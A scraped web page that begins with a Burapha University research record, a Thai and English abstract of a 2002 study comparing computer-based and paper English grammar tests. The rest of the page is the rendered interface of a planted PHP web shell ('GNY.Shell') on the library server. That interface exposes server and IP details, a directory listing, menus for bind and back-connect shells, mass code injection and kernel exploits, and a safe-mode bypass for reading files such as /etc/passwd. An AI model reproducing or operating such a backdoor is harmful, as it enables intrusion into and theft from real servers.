การเปรียบเทียบการใช้แบบทดสอบด้วยคอมพิวเตอร์กับการใช้แบบทดสอบแบบเดิมในการสอนไวยากรณ์ภาษาอังกฤษ.

Titleการเปรียบเทียบการใช้แบบทดสอบด้วยคอมพิวเตอร์กับการใช้แบบทดสอบแบบเดิมในการสอนไวยากรณ์ภาษาอังกฤษ.
Publication TypeResearch
Year of Publication2545
Authorsสมบูรณ์ เจตน์จำลอง., Somboon Chetchumlong.
Corporate Authorsคณะมนุษยศาสตร์และสังคมศาสตร์., Faculty of Humanities and Social Sciences.
Institutionมหาวิทยาลัยบูรพา. (Burapha University).
Cityชลบุรี. (Chonburi).
Typeงานวิจัย.
Keywordsภาษาอังกฤษ - - แบบทดสอบ - - วิจัย., ภาษาอังกฤษ - - แบบทดสอบ., ภาษาอังกฤษ - - ไวยากรณ์ - - วิจัย., ภาษาอังกฤษ - - ไวยากรณ์ - - แบบทดสอบ., ภาษาอังกฤษ - - ไวยากรณ์., มหาวิทยาลัยบูรพา. ภาควิชาภาษาตะวันตก - - วิจัย., สาขาการศึกษา.
AbstractAbstract: การวิจัยครั้งนี้มีจุดมุ่งหมายเพื่อศึกษาเปรียบเทียบค่าคะแนนเฉลี่ยและเวลาเฉลี่ยที่ใช้ในการทำแบบทดสอบไวยากรณ์ภาษาอังกฤษด้วยคอมพิวเตอร์กับค่าคะแนนเฉลี่ยและเวลาเฉลี่ยที่ใช้ในการทำแบบทดสอบไวยากรณ์ภาษาอังกฤษแบบเดิมของนิสิตระดับปริญญาตรีภาคปกติ วิชาเอกและวิชาโทภาษาอังกฤษ จากคณะศึกษาศาสตร์และคณะมนุษยศาสตร์และสังคมศาสตร์ จำนวน 50 คน ซึ่งได้ลงทะเบียนเรียนรายวิชา 212221 ไวยากรณ์และการเรียน (Structure) ตามหลักสูตรของภาควิชาภาคตะวันตก คณะมนุษยศาสตร์และสังคมศาสตร์ มหาวิทยาลัยบูรพา จังหวัดชลบุรี ในภาคเรียนที่ 1 และ 2 ประจำปีการศึกษาพุทธศักราช 2545ในการวิจัยนี้ผู้วิจัยได้แบ่งนิสิตโดยการสุ่มออกเป็นสองกลุ่ม ๆ ละ 25 คนเท่ากัน กลุ่มที่หนึ่งเป็นกลุ่มนิสิตที่เข้ารับการทดสอบไวยากรณ์ภาษาอังกฤษด้วยคอมพิวเตอร์ ส่วนกลุ่มที่สองเป็นนิสิตที่เข้ารับการทดสอบไวยากรณ์ภาษาอังกฤษแบบเดิม แบบทดสอบทั้งสองเป็นแบบปรนัย 4 ตัวเลือกแยกเป็น 2 ประเภท คือ ประเภทเติมคำ และ ประเภทหาข้อความที่ใช้ผิดไวยากรณ์ โดยมีเนื้อหาเหมือนกัน และจำนวนข้อเท่ากันทุกประการ หัวข้อไวยากรณ์ที่ใช้ในการทดสอบเป็นหัวข้อที่สุ่มมาจากเนื้อหาที่นิสิตเรียนต่อไปนี้ Tense, Direct-Indirect Speech, Subject/Verb Agreement, Gerund, Comparison of Adjectives, Agreement with Pronouns, Causative และ Sentence Types โดยนิสิตต้องเข้ารับการทดสอบหลังจากที่เรียนหัวข้อนั้น ๆ จบแล้ว รวมจำนวนครั้งที่นิสิตทั้งสองกลุ่มต้องเข้ารับการทดสอบตลอดแต่ละภาคเรียนทั้งหมด 8 ครั้งในการทดสอบแต่ละครั้งนิสิตทั้งสองกลุ่มจะเข้ารับการทดสอบพร้อมกันภายในห้องปฏิบัติการทางภาษาห้องเดียวกัน และควบคุมการทดสอบโดยผู้สอนคนเดียวกันก่อนนำแบบทดสอบไวยากรณ์ภาษาอังกฤษไปเก็บข้อมูลผู้วิจัยได้ทดลองใช้แบบทดสอบกับกลุ่มตัวอย่างที่มีลักษณะใกล้เคียงกับกลุ่มประชากร แล้วจึงนำแบบทดสอบที่วิเคราะห์แล้วผ่านเกณฑ์ค่าอำนาจจำแนกและค่าความยากง่ายมาใช้ในการเก็บข้อมูล นิสิตในกลุ่มที่ใช้แบบทดสอบไวยากรณ์ภาษาอังกฤษด้วยคอมพิวเตอร์สามารถเลือกคำตอบได้จากการกดแป้น keyboard โดยไม่สามารถเปลี่ยนคำตอบที่เลือกแล้วได้ และจะทราบคะแนนผลการสอบได้ทันทีที่ทำข้อสอบแต่ละชุดเสร็จ ส่วนนิสิตในกลุ่มที่ทำข้อสอบแบบเดิมสามารถเลือกคำตอบแล้วกากบาทลงในกระดาษคำตอบที่กำหนดให้โดยจะทราบผลหลังจากทีผู้สอนตรวจเสร็จแล้ว การบันทึกเวลาในการทดสอบทั้งสองกลุ่มจะเริ่มตั้งแต่นิสิตเริ่มทำข้อสอบไปจนเสร็จสิ้นการทำข้อสอบของแต่ละคนในแต่ละกลุ่ม จากนั้นนำข้อมูลที่ได้มาวิเคราะห์โดยค่าทางสถิติที่ใช้ในการวิเคราะห์ข้อมูล คือ ค่าคะแนนเฉลี่ย ค่าความเบี่ยงเบนมาตรฐานและค่าการทดสอบที (t-test)ผลการวิจัยปรากฎว่า 1) ค่าคะแนนเฉลี่ยของนิสิตกลุ่มที่ใช้แบบทดสอบไวยากรณ์ภาษาอังกฤษด้วยคอมพิวเตอร์สูงกว่าค่าคะแนนของนิสิตกลุ่มที่ใช้แบบทดสอบไวยากรณ์ภาษาอังกฤษแบบเดิมทุกหัวข้อที่ทดสอบอย่างมีนัยสำคัญทางสถิติที่ระดับ .05 และ 2) กลุ่มนิสิตที่ใช้แบบทดสอบไวยากรณ์ภาษาอังกฤษด้วยคอมพิวเตอร์ใช้เวลาเฉลี่ยในการทำข้อสอบทุกประเภท ทุกหัวข้อน้อยกว่าเวลาเฉลี่ยของกลุ่มนิสิตที่ใช้แบบทดสอบไวยากรณ์ภาษาอังกฤษแบบเดิม Abstract: The purposes of this study were to compare the mean scores of computer-based tests to those of conventional of paper-pencil tests, and to compare the average time used in performing both tests in an English grammar class. The population consisted of 50 undergraduate students, English majors and minors from the Faculty of Education and the Faculty of Humanities and Social Sciences, Burapha University, Chon Buri, Thailand, These sutdents enrolled to study Structure (212221) in the Department of Western Languages, Faculty of Humanities and Social Sciences, Burapha University in semesters 1 and 2 in the academic year 2002.In the study 50 students were divided equivalently into two groups: 25 students in the computer-based test group and another 25 students in the paper-and-pencil test group. For this comparison, the computer-based and paper-and-pencil tests were identical. Eight topics: Tense, Direct-indirect Speech, Subject/Verb Agreement, Gerund, Comparison of Adjectives, Agrement with Pronouns, Causative and Sentence Types, were selected randomly from what the students studied in their grammar class. Throughout the semester, both computer-based and conventional tests were implemented 8 times at the same tiem, in the same language laboratory proctored by the same instructor when the students had finished each topic.After being tried out, both computer-based and conventional tests were manipulated to collect data from the population group. The students in the computer-based test group selected their answers by pressing their computer keyboard while those in the conventional test group marked theirs on answer sheets. The test items providing appropriate results from the standardized criteria of discrimination and difficulty were analyzed through the statistical applications of mean, standard deviation and t-test.The results were 1) the overall mean scores of the students in the computer-based test group were significantly higher than those of the students in the conventional test group at the level of .05, and 2) the students in the computer-based test group used less time to complete their tests than those in the conventional test group did.
Research Notesได้รับทุนสนับสนุนจากงบประมาณเงินรายได้คณะมนุษยศาสตร์และสังคมศาสตร์ มหาวิทยาลัยบูรพา
Alternate TitleComparison of computer-based and conventional tests in teaching english gramma.
GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
 _____ _  ___   __ _____ _     _ _ 
 / ____| \ | \ \  / // ____| |    | | |
| | __| \| |\ \_/ /| (___ | |__  ___| | |
| | |_ | . ` | \  / \___ \| '_ \ / _ \ | |
| |__| | |\ | | | _ ____) | | | | __/ | |
             \_____|_| \_| |_|(_)_____/|_| |_|\___|_|_| {V1.1 edited by $c0rPi0n}
Apache/2.2.22 (EL). PHP/5.3.8
Kernel: Linux www.lib.buu.ac.th 2.6.18-371.1.2.el5 #1 SMP Tue Oct 22 12:51:53 EDT 2013 x86_64Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 270.85 GB of 389.83 GB (69.48%)Server IP: 10.32.1.15 - Your IP: 54.167.171.79

/var/www/html/www/buuir/research/   drwxrwxr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (22 files and 8 folders):

Name [asc] Size Modify Owner/Group Perms Action
.. LINK 01.09.2014 14:07:15 500/500 drwxrwxr-x [info] 
. LINK 24.01.2015 12:35:08 500/500 drwxrwxr-x [info] 
[scripts] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[profiles] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[includes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[sites] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[modules] DIR 24.01.2015 12:55:44 500/500 drwxr-xr-x [info] 
[misc] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[themes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[under] DIR 03.06.2014 15:19:55 500/500 drwxrwxr-x [info] 
 CHANGELOG.txt 63.49 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 web.config 2 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 README.txt 3.41 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction_buuir.jpg 44.98 KB 03.06.2014 15:53:14 500/500 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 7.77 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 17.09.2011 21:50:20 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction.html 296 B 03.06.2014 15:56:51 500/500 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.45 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.06 KB 08.03.2013 17:07:32 500/500 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 update.php 18.88 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .gitignore 174 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 996 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0204 ]:.